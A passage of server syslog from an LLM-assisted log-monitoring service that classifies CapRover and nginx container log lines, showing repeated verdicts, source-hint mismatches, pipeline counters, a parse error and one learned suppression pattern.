docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:29:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:48.687331 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:51.879884 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:29:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:51.879929 [analyzer] Source hint mismatch: LLM says "docker container web/api server access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:54.958778 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:29:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:54.958839 [analyzer] Source hint mismatch: LLM says "docker/captain (web/API in container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:57.990410 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:29:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:57.990451 [analyzer] Source hint mismatch: LLM says "docker/captain web access log (app HTTP server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:59 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:59.041453 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=regex Mar 19 
22:29:59 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:59.041491 [analyzer] Source hint mismatch: LLM says "nginx access log (captain-nginx container)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern Mar 19 22:30:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:00.925982 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:30:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:00.926022 [analyzer] Source hint mismatch: LLM says "docker container access logs (api service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:04 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:04.013723 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=contains Mar 19 22:30:04 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:04.013762 [analyzer] Source hint mismatch: LLM says "dockerized web/API service (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:06.160559 [observer] Pipeline: processed=266 pattern_hits=145 llm_calls=120 llm_errors=2 learned=0 Mar 19 22:30:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:06.160624 [observer] Patterns: hash=145 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=121 Mar 19 22:30:07 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:07.494859 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:30:07 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:07.494903 [analyzer] Source hint mismatch: LLM says "docker container web/API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 
22:30:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:09.706752 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:30:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:09.706788 [analyzer] Source hint mismatch: LLM says "docker-captain (containerized web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:12.909247 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:30:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:12.909285 [analyzer] Source hint mismatch: LLM says "docker container access logs (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:15.853339 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:30:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:15.853379 [analyzer] Source hint mismatch: LLM says "docker container web/app access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:18.675621 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.74 action=suppress pattern_type=prefix Mar 19 22:30:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:18.675657 [analyzer] Source hint mismatch: LLM says "docker container HTTP access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:21.958096 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:30:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:21.958186 [analyzer] Source hint mismatch: LLM says "docker/captain (web service access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:24.638925 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:30:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:24.638964 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:25.738116 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:30:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:25.738155 [analyzer] Source hint mismatch: LLM says "docker containerized web service (API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:27.914106 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.66 action=allow pattern_type=prefix Mar 19 22:30:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:27.914145 [analyzer] Source hint mismatch: LLM says "docker container (web app HTTP access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:30.939348 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:30:30 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:30.939384 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:34.028881 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:30:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:34.028924 [analyzer] Source hint mismatch: LLM says "docker container web/api proxy", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:36.161448 [observer] Pipeline: processed=291 pattern_hits=159 llm_calls=131 llm_errors=2 learned=0 Mar 19 22:30:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:36.161473 [observer] Patterns: hash=159 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=132 Mar 19 22:30:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:36.811614 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:30:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:36.811647 [analyzer] Source hint mismatch: LLM says "docker container web service access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:39.676987 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:30:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:39.677026 [analyzer] Source hint mismatch: LLM says "docker-captain (app HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:42 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:30:42.735080 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:30:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:42.735118 [analyzer] Source hint mismatch: LLM says "docker/captain (app proxy or service access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:45.736585 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:30:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:45.736758 [analyzer] Source hint mismatch: LLM says "docker container web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:48.983217 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:30:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:48.983254 [analyzer] Source hint mismatch: LLM says "docker/captain (app web server access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:51.689542 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:30:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:51.689578 [analyzer] Source hint mismatch: LLM says "docker container access log (application HTTP)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:54.972221 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=regex Mar 19 22:30:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:54.972254 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:30:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:57.785852 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:30:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:57.785891 [analyzer] Source hint mismatch: LLM says "docker container (web/API server access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:00.957208 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:31:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:00.957244 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:03.794946 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:03.794982 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) running an HTTP API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:06.160356 [observer] Pipeline: processed=314 pattern_hits=172 llm_calls=141 llm_errors=2 learned=0 Mar 19 22:31:06 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:31:06.160376 [observer] Patterns: hash=172 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=142 Mar 19 22:31:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:06.761519 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix Mar 19 22:31:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:06.761557 [analyzer] Source hint mismatch: LLM says "docker container web/API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:09.934636 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=contains Mar 19 22:31:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:09.934673 [analyzer] Source hint mismatch: LLM says "docker/captain container access logs (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:12.798585 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:31:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:12.798626 [analyzer] Source hint mismatch: LLM says "docker container access log (api service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:15.711515 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:15.711555 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP server", actual is 
"captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:18.887664 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=contains Mar 19 22:31:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:18.887703 [analyzer] Source hint mismatch: LLM says "docker container (web/API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:24.833100 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:31:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:24.833140 [analyzer] Source hint mismatch: LLM says "docker/captain (web access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:26.164907 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:26.164945 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:27.658647 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:31:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:27.658680 [analyzer] Source hint mismatch: LLM says "docker-captain (containerized web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:30 ip-172-26-12-110 observer[1561913]: 
2026/03/19 22:31:30.919723 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:30.919760 [analyzer] Source hint mismatch: LLM says "dockerized web service/API (captain-captain container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:32 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:32.002614 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:31:32 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:32.002652 [analyzer] Source hint mismatch: LLM says "docker container (certbot)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:33.613028 [llm] Failed to parse verdict from: { Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "classification": "safe", Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "confidence": 0.84, Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "reason": "This appears to be a routine certbot certificate renewal command executed by a known container.", Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "action": "allow", Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "pattern_type": "prefix", Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "pattern": "executeCommand Container: captain-certbot certbot renew --non-interactive", Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "source_hint": "docker/exec in captain-certbot container", Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "variable_fields": [ Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: { Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "token": "2026-03-19T22:31:32.325528259Z", Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "type": 
"timestamp", Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "replacement": "" Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: }, Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: { Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "token": "March 19th 2026, 10:31:32.325 pm ", Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "type": "timestamp", Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: "replacement": "" Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: } Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: ] Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: } Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:33.613067 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:33.613077 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:31:32.325528259Z March 19th 2026, 10:31:32.325 pm executeCommand Container... 
Mar 19 22:31:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:34.758750 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:34.758785 [analyzer] Source hint mismatch: LLM says "docker container (web/API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:35 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:35.193241 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 19 22:31:35 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:35.193280 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx error shows open() failed for a specific ACME challenge token path; repeated missing challenge files can indicate failed/aborted certificate validation attempts or misconfiguration rather than normal operation. Line=2026-03-19T22:31:33.376974387Z 2026/03/19 22:31:33 [error] 408#408: *741437 open() "/usr/share/nginx/default/.well-known/acme-challenge/iYFHqno9VfY8hIy2K3E1W8C_3ZmBGd0Zov_6RmDmY3g" failed (2: No such ... 
Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.161572 [observer] Pipeline: processed=341 pattern_hits=185 llm_calls=155 llm_errors=3 learned=0 Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.161599 [observer] Patterns: hash=185 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=156 Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.620153 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.620215 [analyzer] Source hint mismatch: LLM says "docker container (certificate renewal / load balancer maintenance)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.929586 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.929626 [analyzer] Source hint mismatch: LLM says "nginx in Docker", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern Mar 19 22:31:37 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:37.598231 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=contains Mar 19 22:31:37 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:37.598265 [analyzer] Source hint mismatch: LLM says "docker/nginx (reload manager or entrypoint)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:38 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:38.055616 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=noise confidence=0.78 action=suppress pattern_type=prefix Mar 19 22:31:38 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:38.055650 [analyzer] Source hint mismatch: LLM says "nginx (docker container captain-nginx)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern Mar 19 22:31:38 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:38.743967 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:38 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:38.744009 [analyzer] Source hint mismatch: LLM says "docker/container exec (nginx config test)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:39.367784 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=noise confidence=0.78 action=suppress pattern_type=prefix Mar 19 22:31:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:39.367818 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+) Mar 19 22:31:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:39.750631 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.72 action=suppress pattern_type=prefix Mar 19 22:31:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:39.750666 [analyzer] Source hint mismatch: LLM says "docker/captain-captain container (app reload automation)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:40.374596 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=noise confidence=0.72 action=suppress pattern_type=prefix Mar 19 22:31:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:40.374634 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+) Mar 19 22:31:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 
22:31:40.810509 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:40.810545 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:41 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:41.333737 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=noise confidence=0.88 action=suppress pattern_type=prefix Mar 19 22:31:41 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:41.333774 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [suppress]: "the \"listen ... http2\" directive is deprecated, use the \"http2\" directive instead in /etc/nginx/conf.d/captain.conf:" Mar 19 22:31:41 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:41.835785 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:41 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:41.835823 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) managing NGINX reloads", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:42.854222 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:42.854257 [analyzer] Source hint mismatch: LLM says "docker container access log (app/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:44 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:44.022796 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:31:44 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:44.022833 [analyzer] Source hint mismatch: LLM says "docker:captain (captain-captain service access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:45.179541 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:31:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:45.179580 [analyzer] Source hint mismatch: LLM says "docker web/app container access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:31:46 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:46.323369 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 